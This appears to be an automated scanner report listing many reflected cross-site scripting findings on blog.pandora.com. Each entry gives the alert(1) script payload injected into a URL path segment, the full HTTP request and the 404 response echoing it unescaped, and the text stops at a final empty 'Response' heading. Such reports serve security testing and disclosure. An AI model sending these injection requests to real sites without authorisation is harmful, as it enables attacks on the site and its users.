The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
